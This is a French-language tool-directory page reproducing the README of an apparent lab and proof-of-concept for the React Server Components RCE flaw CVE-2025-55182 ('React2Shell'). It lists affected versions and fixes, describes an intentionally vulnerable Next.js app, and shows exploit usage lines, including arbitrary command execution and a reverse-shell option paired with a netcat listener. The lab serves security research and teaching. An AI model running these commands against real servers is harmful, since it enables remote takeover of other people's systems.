Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-55182-poc — Environnement de laboratoire et exploit PoC pour CVE-2025-55182 (React2Shell), une vulnérabilité RCE critique dans les composants serveur React. Comprend une application vulnérable, des scripts d'exploitation et un scanner pour la recherche en sécurité et l'éducation. | Kitploit
Outils/GitHubGitHub/mooowu/cve-2025-55182-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges UtilesLabs et Pratique
GitHubmooowu/cve-2025-55182-poc

cve-2025-55182-poc

Environnement de laboratoire et exploit PoC pour CVE-2025-55182 (React2Shell), une vulnérabilité RCE critique dans les composants serveur React. Comprend une application vulnérable, des scripts d'exploitation et un scanner pour la recherche en sécurité et l'éducation.

Voir le dépôt
5il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Laboratoire d'analyse de vulnérabilité CVE-2025-55182 (React2Shell)

Ce dépôt contient un environnement complet pour analyser et reproduire CVE-2025-55182, une vulnérabilité critique d'exécution de code à distance (RCE) dans React Server Components (RSC) affectant React 19.x et Next.js 15.x.

⚠️ AVERTISSEMENT : Ce projet contient intentionnellement du code vulnérable. NE DÉPLOYEZ PAS ceci sur un serveur public ou en environnement de production.

🔍 Aperçu de la vulnérabilité

  • CVE ID: CVE-2025-55182
  • Alias: React2Shell
  • Score CVSS : 10.0 (CRITICAL)
  • Type de vulnérabilité : CWE-502 (Désérialisation de données non fiables)
  • Composants affectés :
    • React Server Components (19.0.0 - 19.2.0)
    • Next.js (15.0.0 - 16.0.7)
    • react-server-dom-webpack, react-server-dom-turbopack

Mécanisme

La vulnérabilité réside dans la manière dont le runtime React Server Components traite les données sérialisées provenant des requêtes HTTP (Server Actions). Un attaquant peut élaborer une charge utile malveillante du protocole 'Flight' qui, lorsqu'elle est désérialisée par le serveur, exécute du code arbitraire avant que les vérifications d'authentification n'aient lieu.

📂 Structure du projet

root@kitploit:~
react2shell/
├── vulnerable-app/       # Application Next.js 15 vulnérable
│   ├── app/
│   │   ├── actions.ts    # Server Actions vulnérables
│   │   └── page.tsx      # Interface utilisateur pour tester la vulnérabilité
│   ├── Dockerfile        # Définition du conteneur
│   └── package.json
├── exploit/              # Outils d'exploitation
│   ├── exploit.py        # PoC Python de l'exploit
│   ├── scanner.py        # Scanner de vulnérabilité
│   └── quick_exploit.sh  # Exploit bash simple
├── docs/                 # Documentation d'analyse
└── docker-compose.yml    # Environnement de laboratoire isolé

🚀 Pour commencer

Prérequis

  • Docker et Docker Compose
  • Python 3.x (pour exécuter les exploits localement)

1. Démarrer l'environnement du laboratoire

Exécutez l'application vulnérable dans un conteneur isolé :

root@kitploit:~
docker-compose up -d --build

L'application sera disponible à l'adresse http://localhost:3000.

2. Vérifier l'application

Accédez à http://localhost:3000 dans votre navigateur. Vous devriez voir l'interface 'React2Shell Lab' avec plusieurs panneaux de test :

  • Exécution de commandes : Test d'injection de commande directe
  • Désérialisation non sécurisée : Test d'exploitation de désérialisation basée sur JSON
  • Lecture de fichier arbitraire : Test de traversée de chemin
  • Informations système : Affichage des détails du système (pour vérifier l'impact de l'exécution de code)

⚔️ Exploitation

Nous fournissons plusieurs outils pour tester la vulnérabilité.

Utilisation de l'exploit Python

  1. Installer les dépendances :

    root@kitploit:~
    pip install -r exploit/requirements.txt
    
  2. Vérifier si vulnérable :

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --check
    
  3. Exécuter une commande :

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 -c "id"
    
  4. Reverse Shell (nécessite un écouteur, par exemple nc -lvnp 4444) :

    root@kitploit:~
    python3 exploit/exploit.py -u http://localhost:3000 --revshell -l HOST_IP -p 4444
    

Utilisation du scanner

Scannez les instances React/Next.js vulnérables :

root@kitploit:~
python3 exploit/scanner.py -u http://localhost:3000

🛡️ Atténuation

Pour corriger cette vulnérabilité dans vos propres applications :

  1. Mettre à jour les dépendances :

    • Mettez à jour React vers la version 19.3.0 ou ultérieure.
    • Mettez à jour Next.js vers la version 15.0.5, 15.1.9 ou 16.0.8 selon votre branche.
  2. Vérifier le correctif : Vérifiez package.json pour vous assurer que les paquets react-server-dom-* sont mis à jour.

📝 Avertissement

Ce projet est uniquement destiné à des fins éducatives et de recherche en sécurité. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de ce matériel.

Télécharger l’outil